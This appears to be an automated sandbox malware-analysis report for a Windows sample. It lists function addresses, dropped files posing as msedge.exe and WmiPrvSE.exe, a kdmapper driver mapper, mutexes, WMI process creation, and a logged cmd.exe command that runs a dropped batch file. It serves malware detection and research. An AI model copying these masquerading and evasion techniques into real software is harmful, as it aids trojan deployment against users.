Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786610D80	0_2_00007FF786610D80
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F8570	0_2_00007FF7865F8570
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865FC550	0_2_00007FF7865FC550
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F5DF0	0_2_00007FF7865F5DF0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7866065D0	0_2_00007FF7866065D0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662268B	0_2_00007FF78662268B
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786607680	0_2_00007FF786607680
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865EE680	0_2_00007FF7865EE680
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F0E80	0_2_00007FF7865F0E80
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786601690	0_2_00007FF786601690
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662267F	0_2_00007FF78662267F
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786622667	0_2_00007FF786622667
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786622673	0_2_00007FF786622673
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662265B	0_2_00007FF78662265B
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662264F	0_2_00007FF78662264F
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786602E50	0_2_00007FF786602E50
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786622643	0_2_00007FF786622643
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662270C	0_2_00007FF78662270C
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786612F10	0_2_00007FF786612F10
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7866226FD	0_2_00007FF7866226FD
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7866226EE	0_2_00007FF7866226EE
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78661A6E0	0_2_00007FF78661A6E0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7866226DF	0_2_00007FF7866226DF
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7866226D0	0_2_00007FF7866226D0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F6ED0	0_2_00007FF7865F6ED0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7866226C1	0_2_00007FF7866226C1
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7866236B0	0_2_00007FF7866236B0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7866226AF	0_2_00007FF7866226AF
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662269D	0_2_00007FF78662269D
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662DB3C	0_2_00007FF78662DB3C
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786619B40	0_2_00007FF786619B40
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786600BA0	0_2_00007FF786600BA0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F8BA0	0_2_00007FF7865F8BA0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865EF480	0_2_00007FF7865EF480
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865FD470	0_2_00007FF7865FD470
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865E24F0	0_2_00007FF7865E24F0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78661ECD0	0_2_00007FF78661ECD0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78660E4B0	0_2_00007FF78660E4B0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786605990	0_2_00007FF786605990
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F0960	0_2_00007FF7865F0960
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78660A160	0_2_00007FF78660A160
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78660EA70	0_2_00007FF78660EA70
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786603A70	0_2_00007FF786603A70
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F9250	0_2_00007FF7865F9250
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786605220	0_2_00007FF786605220
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865FA2F0	0_2_00007FF7865FA2F0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78661B2D0	0_2_00007FF78661B2D0
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0060848E	5_2_0060848E
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_006040FE	5_2_006040FE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_006100B7	5_2_006100B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00614088	5_2_00614088
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00617153	5_2_00617153
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_006251C9	5_2_006251C9
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_006032F7	5_2_006032F7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_006162CA	5_2_006162CA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_006143BF	5_2_006143BF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0060F461	5_2_0060F461
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0062D440	5_2_0062D440
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0060C426	5_2_0060C426
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_006177EF	5_2_006177EF
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0060286B	5_2_0060286B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0062D8EE	5_2_0062D8EE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_006319F4	5_2_006319F4
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0060E9B7	5_2_0060E9B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00616CDC	5_2_00616CDC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00613E0B	5_2_00613E0B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0060EFE2	5_2_0060EFE2
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00624F9A	5_2_00624F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00438040	12_2_00438040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042C070	12_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449070	12_2_00449070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401000	12_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040B0E0	12_2_0040B0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040C080	12_2_0040C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042D150	12_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004491F0	12_2_004491F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041F193	12_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00409240	12_2_00409240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042C243	12_2_0042C243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004492F0	12_2_004492F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043E2A0	12_2_0043E2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004012B3	12_2_004012B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401359	12_2_00401359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00416361	12_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042D3CC	12_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004493D0	12_2_004493D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004483B0	12_2_004483B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004113BD	12_2_004113BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00405460	12_2_00405460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00447429	12_2_00447429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004094D7	12_2_004094D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040A4E0	12_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042B490	12_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004074B0	12_2_004074B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040B570	12_2_0040B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004366E0	12_2_004366E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041D6A0	12_2_0041D6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449700	12_2_00449700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004117C0	12_2_004117C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042F7DB	12_2_0042F7DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00408850	12_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00403890	12_2_00403890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044A8B0	12_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004488B0	12_2_004488B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00436970	12_2_00436970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0045392E	12_2_0045392E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041399C	12_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040AA00	12_2_0040AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00427AFB	12_2_00427AFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042BC50	12_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00413CC6	12_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042CCDD	12_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042CCF5	12_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00429DF2	12_2_00429DF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437D90	12_2_00437D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040CE00	12_2_0040CE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00431E00	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00415EF6	12_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407EB0	12_2_00407EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00427F62	12_2_00427F62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00443FA0	12_2_00443FA0
Source: C:\Edge\msedge.exe	Code function: 16_2_00007FFB4AF30D80	16_2_00007FFB4AF30D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FFB4AFE39D1	31_2_00007FFB4AFE39D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FFB4AFE30E9	31_2_00007FFB4AFE30E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 32_2_00007FFB4AFF30E9	32_2_00007FFB4AFF30E9
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF10B06	39_2_00007FFB4AF10B06
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF00D80	39_2_00007FFB4AF00D80
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF31225	39_2_00007FFB4AF31225
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF397E0	39_2_00007FFB4AF397E0
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF3D30A	39_2_00007FFB4AF3D30A
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF3BF42	39_2_00007FFB4AF3BF42
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF10FC7	39_2_00007FFB4AF10FC7
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF1177E	39_2_00007FFB4AF1177E
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4AF111A9	39_2_00007FFB4AF111A9
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF30D80	40_2_00007FFB4AF30D80
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF40B06	40_2_00007FFB4AF40B06
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF61225	40_2_00007FFB4AF61225
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF697E0	40_2_00007FFB4AF697E0
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF6BE9D	40_2_00007FFB4AF6BE9D
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF6D30A	40_2_00007FFB4AF6D30A
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF40FC7	40_2_00007FFB4AF40FC7
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF4177E	40_2_00007FFB4AF4177E
Source: C:\Edge\msedge.exe	Code function: 40_2_00007FFB4AF411A9	40_2_00007FFB4AF411A9
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 42_2_00007FFB4AF00D80	42_2_00007FFB4AF00D80
Source: C:\Edge\msedge.exe	Code function: 51_2_00007FFB4AF20D80	51_2_00007FFB4AF20D80
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF20D80	56_2_00007FFB4AF20D80
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF30B06	56_2_00007FFB4AF30B06
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF51225	56_2_00007FFB4AF51225
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF597E0	56_2_00007FFB4AF597E0
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF5BE9D	56_2_00007FFB4AF5BE9D
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF5D30A	56_2_00007FFB4AF5D30A
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF30FC7	56_2_00007FFB4AF30FC7
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF3177E	56_2_00007FFB4AF3177E
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Code function: 56_2_00007FFB4AF311A9	56_2_00007FFB4AF311A9

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\AznuGYbp.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: String function: 00007FF78661E8C0 appears 148 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0061EB78 appears 39 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0061F5F0 appears 31 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 0061EC50 appears 56 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CBE0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040EE60 appears 145 times

Source: IlfCUBRc.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: KiGKqBgX.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: AznuGYbp.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: rWfFWfLI.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: jsWPmlvb.log.16.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: msedge.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: physmeme.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WmiPrvSE.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: IlfCUBRc.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: KiGKqBgX.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: AznuGYbp.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: rWfFWfLI.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: jsWPmlvb.log.16.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@80/50@21/3

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_00606C74 GetLastError,FormatMessageW,

5_2_00606C74

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF786623ED0 CreateThread,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,system,system,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,MessageBoxA,system,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,DeviceIoControl,MessageBoxA,exit,CloseHandle,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,DefWindowProcA,LoadIconA,LoadCursorA,LoadIconA,GetDesktopWindow,GetWindowRect,RegisterClassExA,CreateWindowExA,SetWindowLongA,DwmExtendFrameIntoClientArea,ShowWindow,SetWindowPos,SetLayeredWindowAttributes,UpdateWindow,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,

0_2_00007FF786623ED0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_004345E0 CoCreateInstance,

12_2_004345E0

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_0061A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

5_2_0061A6C2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP

Source: C:\Windows\Speech\physmeme.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_03
Source: C:\Edge\msedge.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03

Source: C:\Edge\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\lar3wzdd

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "

Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxname	5_2_0061DF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxstime	5_2_0061DF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: STARTDLG	5_2_0061DF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: xze	5_2_0061DF1E

Source: seoI30IZZr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\seoI30IZZr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: seoI30IZZr.exe

ReversingLabs: Detection: 55%

Source: seoI30IZZr.exe	String found in binary or memory: Save/Load
Source: seoI30IZZr.exe	String found in binary or memory: Save/Load
